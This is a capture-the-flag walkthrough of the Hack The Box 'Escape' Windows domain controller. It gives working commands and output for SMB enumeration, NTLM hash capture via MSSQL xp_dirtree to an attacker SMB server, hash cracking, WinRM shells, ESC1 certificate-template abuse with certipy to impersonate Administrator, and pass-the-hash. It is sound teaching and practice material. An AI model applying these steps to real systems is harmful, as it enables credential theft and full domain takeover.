Description
Escape is a medium Hack The Box machine that features:
- PDF file of a accesible SMB share reveals MSSQL credentials
- MSSQL service account NTLM hash capture and crack to elevate the privileges
- User Pivoting by leaked credentials in a log file
- Privilege Escalation via impersonating the
Administratoruser using the ESC1 vulnerability in Certificate Templates used in Active Directory Certificate Services
Footprinting
First, we are going to check with ping command if the machine is active and the system operating system. The target machine IP address is 10.10.11.202.
$ ping -c 3 10.10.11.202
PING 10.10.11.202 (10.10.11.202) 56(84) bytes of data.
64 bytes from 10.10.11.202: icmp_seq=1 ttl=127 time=48.8 ms
64 bytes from 10.10.11.202: icmp_seq=2 ttl=127 time=47.2 ms
64 bytes from 10.10.11.202: icmp_seq=3 ttl=127 time=47.4 ms
--- 10.10.11.202 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2004ms
rtt min/avg/max/mdev = 47.214/47.808/48.765/0.683 ms
The machine is active and with the TTL that equals 127 (128 minus 1 jump) we can assure that it is an Windows machine. Now we are going to do a Nmap TCP SYN port scan to check all opened ports.
$ sudo nmap 10.10.11.202 -sS -oN nmap_scan
Starting Nmap 7.95 ( https://nmap.org )
Nmap scan report for 10.10.11.202
Host is up (0.049s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
1433/tcp open ms-sql-s
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
Nmap done: 1 IP address (1 host up) scanned in 4.35 seconds
We get many open ports, related to a Domain Controller Active Directory.
Enumeration
Then we do a more advanced scan, with service version and scripts.
$ nmap 10.10.11.202 -Pn -sV -sC -p53,88,135,139,389,445,464,593,636,1433,3268,3269,5985 -oN nmap_scan_ports
Starting Nmap 7.95 ( https://nmap.org )
Nmap scan report for 10.10.11.202
Host is up (0.048s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after: 2074-01-05T23:03:57
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after: 2074-01-05T23:03:57
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info:
| 10.10.11.202:1433:
| Target_Name: sequel
| NetBIOS_Domain_Name: sequel
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: sequel.htb
| DNS_Computer_Name: dc.sequel.htb
| DNS_Tree_Name: sequel.htb
|_ Product_Version: 10.0.17763
| ms-sql-info:
| 10.10.11.202:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after: 2074-01-05T23:03:57
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after: 2074-01-05T23:03:57
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
|_ start_date: N/A
|_clock-skew: mean: 7h59m58s, deviation: 0s, median: 7h59m57s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 88.21 seconds
We get the services related to an Active Directory, specifically the Domain Controller sequel.htb. We add the host to our /etc/hosts local file.
$ echo "10.10.11.202 sequel.htb" | sudo tee -a /etc/hosts
$ echo "10.10.11.202 dc.sequel.htb" | sudo tee -a /etc/hosts
Enumerating the SMB server we find that we can list the shares using the Guest account.
$ smbclient -L '//sequel.htb/' -U 'Guest%'
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Public Disk
SYSVOL Disk Logon server share
We can read from the Public share. We retrieve the SQL Server Procedures.pdf file.
$ smbclient '//sequel.htb/Public' -U 'Guest%'
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Nov 19 12:51:25 2022
.. D 0 Sat Nov 19 12:51:25 2022
SQL Server Procedures.pdf A 49551 Fri Nov 18 14:39:43 2022
5184255 blocks of size 4096. 1464393 blocks available
smb: \> get SQL Server Procedures.pdf
NT_STATUS_OBJECT_NAME_NOT_FOUND opening remote file \SQL
smb: \> get "SQL Server Procedures.pdf"
getting file \SQL Server Procedures.pdf of size 49551 as SQL Server Procedures.pdf (201,6 KiloBytes/sec) (average 201,6 KiloBytes/sec)
We read the file:
SQL Server Procedures
Since last year we've got quite few accidents with our SQL Servers (looking at you Ryan, with your instance on the DC, why should
you even put a mock instance on the DC?!). So Tom decided it was a good idea to write a basic procedure on how to access and
then test any changes to the database.
...
Accessing from non domain joined machine
Accessing from non domain joined machines can be a little harder.
The procedure is the same as the domain joined machine but you need to spawn a command prompt and run the following
command: cmdkey /add:"<serverName>.sequel.htb" /user:"sequel\<userame>" /pass:<password> . Follow the other steps from
above procedure.
If any problem arises, please send a mail to Brandon (mailto:brandon.brown@sequel.htb
...
Bonus
For new hired and those that are still waiting their users to be created and perms assigned, can sneak a peek at the Database with
user PublicUser and password GuestUserCantWrite1 .
Refer to the previous guidelines and make sure to switch the "Windows Authentication" to "SQL Server Authentication".
We extract a few things from this document referred to the MSSQL service. There are three users in the DC called Ryan, Tom and Brandon (brandon.brown user). There is a common user called PublicUser with the default password GuestUserCantWrite1. We are going to log with this account in the MSSQL service.
$ impacket-mssqlclient 'PublicUser:GuestUserCantWrite1'@sequel.htb
...
SQL (PublicUser guest@master)> enum_db
name is_trustworthy_on
------ -----------------
master 0
tempdb 0
model 0
msdb 1
Exploitation
We are going to create a SMB server with the impacket-smbserver tool to try to capture NTLM hashes from the Microsoft SQL server.
$ impacket-smbserver -smb2support share .
Now we run the xp_dirtree command pointing to our newly-created SMB server.
SQL (PublicUser guest@master)> xp_dirtree \\10.10.14.16\a
subdirectory depth file
------------ ----- ----
We get the hash for the DC01\mssqlsvc MSSQL service account.
$ impacket-smbserver -smb2support share .
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.11.202,60805)
[*] AUTHENTICATE_MESSAGE (sequel\sql_svc,DC)
[*] User DC\sql_svc authenticated successfully
[*] sql_svc::sequel:aaaaaaaaaaaaaaaa:3e5d8762ddf06884b89d2ef5e8414a4c:010100000000000000ef65662b40dc019b5fb1420407d8de00000000010010004c005400420051006c00710076004c00030010004c005400420051006c00710076004c000200100069007300730048007a007900650047000400100069007300730048007a007900650047000700080000ef65662b40dc0106000400020000000800300030000000000000000000000000300000792dd6e46bf26fef3f2513bc38c7342183e7a41865b471078d13fb23fbeb64ab0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00310036000000000000000000
[*] Closing down connection (10.10.11.202,60805)
[*] Remaining connections []
We crack it using John The Ripper.
$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 16 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
REGGIE1234ronnie (sql_svc)
1g 0:00:00:03 DONE 0.2702g/s 2893Kp/s 2893Kc/s 2893KC/s RENZOJAVIER..RAHFIYAW
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
We find the password for sql_svc service account REGGIE1234ronnie. We can spawn a interactive shell with WinRM and evil-winrm tool.
$ evil-winrm -i sequel.htb -u 'sql_svc' -p 'REGGIE1234ronnie'
...
*Evil-WinRM* PS C:\Users\sql_svc\Documents> whoami
sequel\sql_svc
Post-Exploitation
We find the other user logged in the system, Ryan.Cooper.
*Evil-WinRM* PS C:\Users> dir
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/7/2023 8:58 AM Administrator
d-r--- 7/20/2021 12:23 PM Public
d----- 2/1/2023 6:37 PM Ryan.Cooper
d----- 2/7/2023 8:10 AM sql_svc
In the C:\sqlserver\logs directory we find the ERRORLOG.BAK file. We find a failed login from the Ryan.Cooper user, but after that we find a login failed from the NuclearMosquito3 user. This could be a password entered by error as an username.
*Evil-WinRM* PS C:\sqlserver\logs> type ERRORLOG.BAK
...
2022-11-18 13:43:07.44 Logon Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.72 spid51 Attempting to load library 'xpstar.dll' into memory. This is an informational message only. No user action is required.
...
We check the Ryan.Cooper username and the NuclearMosquito3 password for creating a new interactive shell.
$ evil-winrm -i sequel.htb -u 'Ryan.Cooper' -p 'NuclearMosquito3'
...
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> whoami
sequel\ryan.cooper
We logged as the ryan.cooper user. As we observed in the Nmap scan that the services had a SSL certificate we are going to enumerate for Certificate Authorities in the domain for Privilege Escalation.
$ certipy-ad find -username Ryan.Cooper@sequel.htb -password 'NuclearMosquito3' -vulnerable -stdout
...
Certificate Authorities
0
CA Name : sequel-DC-CA
DNS Name : dc.sequel.htb
Certificate Subject : CN=sequel-DC-CA, DC=sequel, DC=htb
Certificate Serial Number : 1EF2FA9A7E6EADAD4F5382F4CE283101
...
CertificateAuthority_MicrosoftDefault.Policy
Permissions
Owner : SEQUEL.HTB\Administrators
Access Rights
ManageCa : SEQUEL.HTB\Administrators
SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
ManageCertificates : SEQUEL.HTB\Administrators
SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
Enroll : SEQUEL.HTB\Authenticated Users
Certificate Templates
0
Template Name : UserAuthentication
Display Name : UserAuthentication
Certificate Authorities : sequel-DC-CA
Enabled : True
...
Permissions
Enrollment Permissions
Enrollment Rights : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Domain Users
SEQUEL.HTB\Enterprise Admins
Object Control Permissions
Owner : SEQUEL.HTB\Administrator
Full Control Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
Write Owner Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
Write Dacl Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
Write Property Enroll : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Domain Users
SEQUEL.HTB\Enterprise Admins
[+] User Enrollable Principals : SEQUEL.HTB\Domain Users
[!] Vulnerabilities
ESC1 : Enrollee supplies subject and template allows client authentication.
The domain is using Active DirectoryCertificate Services. We find the ESC1 vulnerability in the UserAuthentication template of the sequel-DC-CA CA. ESC1 is the stereotypical AD CS misconfiguration that can lead directly to privilege escalation. The vulnerability arises when a certificate template is inadequately secured, permitting a low-privileged user to request a certificate and, importantly, specify an arbitrary identity within the certificate’s SAN. This allows the attacker to impersonate any user, including administrators.
This vulnerability can be exploited in two steps: requesting a certificate using the vulnerable template, injecting the identity of a privileged target. And using the obtained certificate to authenticate as the target. Firstly we need to obtain the SID of the Administrator user of the domain.
$ certipy-ad account -u 'Ryan.Cooper' -p 'NuclearMosquito3' -dc-ip '10.10.11.202' -user 'Administrator' read
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Reading attributes for 'Administrator':
cn : Administrator
distinguishedName : CN=Administrator,CN=Users,DC=sequel,DC=htb
name : Administrator
objectSid : S-1-5-21-4078382237-1492182817-2568127209-500
sAMAccountName : Administrator
userAccountControl : 1114624
whenCreated : 2022-11-18T17:11:51+00:00
The SID is S-1-5-21-4078382237-1492182817-2568127209-500. Now we request the certificate for the target user.
$ certipy-ad req \
-u 'Ryan.Cooper@sequel.htb' -p 'NuclearMosquito3' \
-dc-ip '10.10.11.202' -target 'sequel.htb' \
-ca 'sequel-DC-CA' -template 'UserAuthentication' \
-upn 'Administrator@sequel.htb' -sid 'S-1-5-21-4078382237-1492182817-2568127209-500'
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 14
[*] Successfully requested certificate
[*] Got certificate with UPN 'Administrator@sequel.htb'
[*] Certificate object SID is 'S-1-5-21-4078382237-1492182817-2568127209-500'
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'
The certificate is saved in the administrator.pfx file. Now we are going to authenticate with the machine to retrieve the NTLM hash.
$ certipy-ad auth -pfx 'administrator.pfx' -dc-ip '10.10.11.202'
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'Administrator@sequel.htb'
[*] SAN URL SID: 'S-1-5-21-4078382237-1492182817-2568127209-500'
[*] Using principal: 'administrator@sequel.htb'
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
[-] Use -debug to print a stacktrace
[-] See the wiki for more information
We get the KRB_AP_ERR_SKEW error cause the hour of our machine is not synced with the machine one. We update the time with the NTP protocol.
$ sudo timedatectl set-ntp off
$ sudo rdate -n sequel.htb
We retry the previous command.
$ certipy-ad auth -pfx 'administrator.pfx' -dc-ip '10.10.11.202'
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'Administrator@sequel.htb'
[*] SAN URL SID: 'S-1-5-21-4078382237-1492182817-2568127209-500'
[*] Using principal: 'administrator@sequel.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4ee
We get the NTLM hash for the Administrator, a52f78e4c751e5f5e17e1e9f3e58f4ee. We can restart the hour of our machine and login using the WinRM protocol. We are the Administrator user.
$ sudo timedatectl set-ntp on
$ evil-winrm -i sequel.htb -u Administrator -H 'a52f78e4c751e5f5e17e1e9f3e58f4ee'
...
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
sequel\administrator
Flags
With the Administrator account we can retrieve the user.txt and root.txt flags.
*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\Ryan.Cooper\Desktop\user.txt
<REDACTED>
*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\Administrator\Desktop\root.txt
<REDACTED>